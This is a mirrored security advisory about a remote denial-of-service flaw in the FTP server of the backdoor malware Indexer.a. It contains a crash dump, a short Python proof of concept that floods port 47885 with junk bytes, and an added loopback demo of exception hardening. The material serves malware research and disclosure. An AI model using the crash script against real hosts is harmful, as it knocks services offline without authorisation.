Backdoor.Win32.Indexer.a / Remote Dos

CVE: N/A
Category: CWE-399
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2021-02-16
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS: 0.02192
EPSSP: 0.50265


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020097

Below is a copy:

Backdoor.Win32.Indexer.a / Remote Dos
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/2b576e7551afe1c7575dc680396f1b5b_B.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Indexer.a
Vulnerability: Remote Denial Of Service
Description: Indexer.a runs an FTP server that listens on TCP port 47885; sending it an unexpected payload of junk characters causes an unhandled exception, resulting in a crash and denial of service.
Type: PE32
MD5: 2b576e7551afe1c7575dc680396f1b5b
Vuln ID: MVID-2021-0092
Dropped files: 
Disclosure: 02/16/2021 

Memory Dump:
(1618.14b0): Unknown exception - code 0eedfade (first/second chance not available)
eax=00000000 ebx=00000000 ecx=00000007 edx=00000000 esi=00000003 edi=00000003
eip=7710ed3c esp=0019f460 ebp=0019f5f0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400          ret     14h

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454        mov     ecx,dword ptr [esp+54h]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
   ExceptionCode: 0eedfade
  ExceptionFlags: 00000001
NumberParameters: 7
   Parameter[0]: 004129ae
   Parameter[1]: 04105d4c
   Parameter[2]: 04105dc8
   Parameter[3]: 00000000
   Parameter[4]: 00000000
   Parameter[5]: 0019fe9c
   Parameter[6]: 0019fddc

DEFAULT_BUCKET_ID:  DELPHI_EXCEPTION

PROCESS_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code text>

EXCEPTION_PARAMETER1:  004129ae

EXCEPTION_PARAMETER2:  04105d4c

EXCEPTION_PARAMETER3:  04105dc8

EXCEPTION_PARAMETER4: 0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  000014b0

PRIMARY_PROBLEM_CLASS:  DELPHI_EXCEPTION

BUGCHECK_STR:  APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER:  from 00443345 to 75eb08f2

STACK_TEXT:  
0019fdf0 00443345 041050ac 041050ac 0044317f KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be wrong.
0019fe14 0040c70b 0040ba01 04102c70 00443345 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe20 00443345 04102c70 04102c70 0044317f Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!FtpsrvTFtpServer$bdtr$qqrv+0x47
0019fe2c 0044317f 00000000 0019fe9c 00000000 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe44 004311ea 04102200 00000001 0044c7a9 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x2fe43
0019fe50 0044c7a9 0041c253 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x1deae
0019fe54 0041c253 04102c70 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x3946d
0044c7a9 52ff108b 84c358e4 c3017fd2 108b5250 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x8f17
0044c7ad 84c358e4 c3017fd2 108b5250 5ae852ff 0x52ff108b
0044c7b1 c3017fd2 108b5250 5ae852ff 8090c358 0x84c358e4
0044c7b5 108b5250 5ae852ff 8090c358 45a9b03d 0xc3017fd2
0044c7b9 5ae852ff 8090c358 45a9b03d 10760100 0x108b5250
0044c7bd 8090c358 45a9b03d 10760100 006a006a 0x5ae852ff
0044c7c1 45a9b03d 10760100 006a006a df68006a 0x8090c358
0044c7c5 10760100 006a006a df68006a e80eedfa 0x45a9b03d
0044c7c9 006a006a df68006a e80eedfa 0000bb7f 0x10760100
0044c7cd df68006a e80eedfa 0000bb7f 809090c3 0x6a006a
0044c7d1 e80eedfa 0000bb7f 809090c3 45a9b03d 0xdf68006a
0044c7d5 00000000 809090c3 45a9b03d 16740000 0xe80eedfa


FOLLOWUP_IP: 
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+30009
00443345 8b7310          mov     esi,dword ptr [ebx+10h]

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b

IMAGE_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  3814be7c

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

BUCKET_ID:  APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FAILURE_BUCKET_ID:  DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe!Ftpsrvcinitialization$qqrv


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"   # placeholder: address of the host running the sample
PORT=47885               # FTP listener opened by Indexer.a

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    # 256 junk bytes; a bytes literal so this runs under Python 3 as well as Python 2
    PBARBAR=b"A"*256
    s.send(PBARBAR)
    s.close()

    print("Backdoor.Win32.Indexer.a / Remote Dos")
    print("MD5: 2b576e7551afe1c7575dc680396f1b5b")
    print("By Malvuln")

if __name__=="__main__":
    doit()
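The crash described above is the textbook unhandled-exception denial of service: the dump shows a Delphi exception (the DELPHI_EXCEPTION bucket, raised through KERNELBASE!RaiseException from the Ftpsrv frames) that nothing in the sample's FTP server catches, so one malformed client line ends the whole process. The Python below is an added illustration, not code from Malvuln's advisory or from the malware itself. It models that failure mode with a minimal FTP command parser: handle_unhardened lets the parser's exception escape, handle_hardened confines it to the one connection and answers with a 500 reply, and run_loopback runs either handler behind a throwaway TCP listener on 127.0.0.1 to show which one is still serving after junk arrives. The line limit, reply strings and sample inputs are constructed for the example and say nothing about how the real sample parses its protocol.

```python
import socket
import threading
from typing import Callable, List, Tuple

# Constructed sample inputs (not taken from the advisory): one well-formed
# FTP command and the kind of oversized junk the advisory describes.
SAMPLE_GOOD = b"USER anonymous\r\n"
SAMPLE_JUNK = b"A" * 256

MAX_LINE = 512  # assumed limit: FTP control lines are short, reject anything longer


def parse_ftp_command(data: bytes) -> Tuple[str, str]:
    """Parse one FTP control-connection line into (VERB, argument).

    Raises ValueError for anything that is not a CRLF-terminated ASCII command
    (a UnicodeDecodeError is a ValueError subclass), which is the kind of
    parser failure the advisory's dump shows escaping uncaught."""
    if len(data) > MAX_LINE:
        raise ValueError("command line too long")
    if not data.endswith(b"\r\n"):
        raise ValueError("missing CRLF terminator")
    line = data[:-2].decode("ascii")
    verb, _, arg = line.partition(" ")
    if not verb.isalpha():
        raise ValueError("malformed verb")
    return verb.upper(), arg


def handle_unhardened(data: bytes) -> bytes:
    """Handler modelled on the crash: no exception handling at all, so one
    malformed line propagates up and, in a process with no outer handler,
    terminates the whole service."""
    verb, _arg = parse_ftp_command(data)
    return f"331 {verb} accepted\r\n".encode()


def handle_hardened(data: bytes) -> bytes:
    """Same handler with the parser failure confined to this connection:
    the client gets a 5xx reply and the listener keeps accepting."""
    try:
        verb, _arg = parse_ftp_command(data)
    except ValueError:
        return b"500 Syntax error, command unrecognized.\r\n"
    return f"331 {verb} accepted\r\n".encode()


def raises(handler: Callable[[bytes], bytes], data: bytes) -> bool:
    """True if the handler lets an exception escape for this input."""
    try:
        handler(data)
    except Exception:
        return True
    return False


def run_loopback(handler: Callable[[bytes], bytes],
                 payloads: List[bytes]) -> Tuple[bool, List[bytes]]:
    """Serve each payload on a fresh loopback connection with the given handler.

    Returns (server_survived, replies). An exception escaping the handler ends
    the accept loop, which is the process-wide crash the advisory reports;
    later clients then get no reply (connection refused or reset)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port, local only
    srv.listen(5)
    port = srv.getsockname()[1]
    alive = {"ok": True}

    def loop() -> None:
        try:
            for _ in payloads:
                conn, _addr = srv.accept()
                with conn:
                    conn.sendall(handler(conn.recv(4096)))
        except Exception:
            alive["ok"] = False  # unhandled exception: the server is gone
        finally:
            srv.close()

    t = threading.Thread(target=loop, daemon=True)
    t.start()
    replies: List[bytes] = []
    for payload in payloads:
        c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            c.connect(("127.0.0.1", port))
            c.sendall(payload)
            replies.append(c.recv(4096))
        except OSError:
            replies.append(b"")  # nothing listening any more
        finally:
            c.close()
    t.join(timeout=5)
    return alive["ok"], replies


if __name__ == "__main__":
    for name, handler in (("unhardened", handle_unhardened), ("hardened", handle_hardened)):
        survived, replies = run_loopback(handler, [SAMPLE_JUNK, SAMPLE_GOOD])
        print(f"{name}: server survived={survived}, replies={replies}")
```

The point of the pairing is that the junk payload itself is harmless; what turns a parser error into a denial of service is the absence of a per-connection exception boundary, exactly what the Delphi exception reaching RaiseException with no handler in the dump indicates.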



Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
